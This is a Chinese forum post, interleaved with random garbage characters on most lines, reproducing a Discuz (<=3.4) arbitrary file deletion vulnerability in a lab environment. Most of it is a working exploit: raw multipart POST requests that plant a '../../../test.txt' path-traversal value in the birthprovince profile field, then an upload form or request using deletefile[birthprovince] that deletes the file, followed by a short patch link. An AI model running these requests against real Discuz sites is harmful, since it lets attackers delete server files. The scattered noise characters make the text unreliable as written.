|
|
; q" K# t# K2 i& \
0 X/ I& a7 `1 e; t1 ^" m: }0 l前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
S! g, }; Y! ~& k) A w$ ]3 ~影响版本:Discuz < =3.4 环境
# \0 P6 F# B) m; W2 \8 g- D3 ^' b9 B' ?; P6 N1 o% u, j
复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。
' Z& ?% ~# ^: z; @( T3 c新建test.txt; X7 b/ P( ?: i5 C; a9 O: h6 O
访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。; L5 e% ?+ W) M1 O/ g( f m
e9 ]$ x) W8 E; H0 v
! p( [! p' H4 C# [. w1 G( e9 _9 V查看formhash1 n/ \5 ]6 P! n5 U$ | o. j9 J; g3 |/ _
利用burp抓包,获取cookie
! ] z( O4 y/ Y+ m2 t6 @. N9 \! F2 v! o% I1 C8 @# ^- t% d1 y. u
4 Y) ]/ }) b% u( Z1 w' ?2 Q k
3 T% e- z& t# o
- \1 g8 _/ y4 X4 `9 _# F1 }/ F
- q& b+ K1 e* h& m1 ~4 k抓取cookie" N( q l j1 N# l4 z
& G: s* W1 ]* L# W! a发送下面数据包:修改cookie,formhash,还有删除的文件3 ^) {0 i% |- t0 ?, d1 t. ] L s, z
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
* U. L$ @8 \& ]1 X: p$ ?& ~ DHost: localhost5 x$ J. V" ^7 C5 n
Content-Length: 3675 t# X. Q& G c, L6 Q' C
Cache-Control: max-age=01 M$ A4 A& ^( {9 Z+ f. [( W. }
Upgrade-Insecure-Requests: 1
& q9 e# S3 K) o/ l9 v# ]: xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
3 H4 M4 Q0 Q4 w6 g% nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
( C& ~/ I9 l# J2 d o) g+ PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 \3 G2 F7 I' }
Accept-Encoding: gzip, deflate
8 J& @$ t) t8 IAccept-Language: zh-CN,zh;q=0.8,en;q=0.6
, B( q+ e( Q* P& V$ bCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056: |- O+ O0 x6 K0 W1 r
Connection: close, a, o3 D) ^' @( K: J% ^4 p; C0 F
------WebKitFormBoundaryPFvXyxL45f34L12s* a% X2 {; K) d7 [
Content-Disposition: form-data; name="formhash"
) [8 ]) O9 V$ r! F. ~8 n84a7f3768 g1 m. o) e, ^
------WebKitFormBoundaryPFvXyxL45f34L12s
" B* ]( c. C- w' GContent-Disposition: form-data; name="birthprovince"
$ W' s- |* @2 O+ f../../../test.txt7 [# l9 n8 M ^5 g4 ?+ A$ M2 T9 J7 I: P
------WebKitFormBoundaryPFvXyxL45f34L12s5 s% U/ @5 v4 \- r- d
Content-Disposition: form-data; name="profilesubmit". _& a0 x: j0 g9 U
19 d( {+ [+ I6 n' Y5 a
------WebKitFormBoundaryPFvXyxL45f34L12s--
5 k; T6 i7 L' q! j1 Y2 F发送删除的数据包
7 d5 M. e* d# @; G刷新页面,查看出生地就会显示成下图所示的状态:1 S' l. O O$ L$ \9 A
数据成功写入9 P1 y9 K! B& t* h4 Z- p( o! t
3 N; J7 |0 W" Q( z$ w% u$ [
! L% c# n" h, W) d) | u7 m w说明数据已经进入数据库:; }% _/ X+ ^0 S8 A% p3 M
然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:
! w# H! z3 z; |, w7 h% _# {* q<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">
. t% j6 e& P5 a- J! A3 }; e<input type="file"name="birthprovince" id="file" />
* G! |9 u- [+ b2 c4 }1 d& X<input type="text"name="formhash" value="84a7f376"/></p>
$ |. u4 N% A) b- M2 x<input type="text"name="profilesubmit" value="1"/></p>* L' ]% _: _& i
<input type="submit"value="Submit" />* _! V" a4 l$ O
</from># s" Q, j- D" z( D# S
! Z' a- k% c/ u6 o9 `% p# @
- u( W4 u1 D8 k1 K) ^# x: [5 {
$ [ z' X% f% ^5 e- a4 z6 G) R& E% W
& ~6 N4 j/ f. `
或者直接构建数据包:0 h' W; y* k# r0 R) _
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
. b1 r2 _2 _. X6 Y8 aHost: 192.168.220.131
; f7 b6 e% H: ?% O- b1 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0: O# [# {2 L9 q& ~' p/ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
' D% s9 N- [" x9 }8 @& VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ O/ b* W- r( [ m! m M: R
Accept-Encoding: gzip, deflate$ A0 V/ M2 ?7 i9 L
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
' h) l8 h0 Z/ ^0 ]) R, g1 bContent-Length: 91989) B: J$ h: m9 Q* ~2 B% V
Connection: close' a2 M' _4 z8 y; J3 a. r! |
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
" h& d& O- a A, XUpgrade-Insecure-Requests: 13 t( j' F3 M8 R4 T( s# S
-----------------------------123821742118716
5 B& q/ D# Y9 b! B% h: L8 hContent-Disposition: form-data; name="birthprovince"; filename="0.jpg") [( d" D2 ^! |; p0 u/ R7 J% X
Content-Type: image/jpeg
; f! _$ L1 n8 d Pzerba(这里写啥都可以)$ h1 @/ s% W0 d+ i8 V6 N
-----------------------------123821742118716--
- K' o, [8 d1 F6 X$ _/ T# T( q& ?; ]: T/ w& C$ d
% i/ l+ M# b0 k* g8 \$ N c
2 {0 `. J0 F" @; e! |7 U6 u6 x
* Y% N) D4 F2 H* k4 T' z E
( Z. u3 V' u; t X) o$ l8 c% c8 f1 h; |
# t$ N' J; W+ R6 Q" H ], z% ]
6 `) w! u! T5 ^: U4 q, ~
" r2 f! q8 T I1 h6 @
# P: o9 `' l0 l% Q6 }& a2 [- x$ w+ j* Q6 {6 L% Y5 F
进去discuz看看,可以看到,test.txt文件已经被删除了。
/ n2 y3 v6 |9 L6 _* O6 _* f. a6 H( X6 ]9 {
. k1 w0 Q6 F d V6 ^8 Y* c
# N' Q; Q2 ^$ b3 B* J/ }" ?- H
3 j( Z" \% e/ E, K4 K
/ c& p+ _( C2 ~1 i+ p1 Q4 I9 _, N修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e5747 y& T3 ?! r* U
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
' T+ p- v i3 D1 B2 N
' E+ E3 y3 r; {0 t# n, ^7 @
- w+ u- [2 o7 H- z4 ~0 D4 j/ M( \; q
! K: S4 U4 ~$ Q7 y+ s' {* r2 `8 E0 K# y2 Z6 ~. N% F$ H
$ G" U. m! x& G" b; G+ {
, F* b( ~ N# |) k0 r+ F
6 C* |8 U# m: W1 B, n6 g7 ^# h: A' @9 b% a+ u
2 y6 M' W# C3 w5 K" \% | |
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜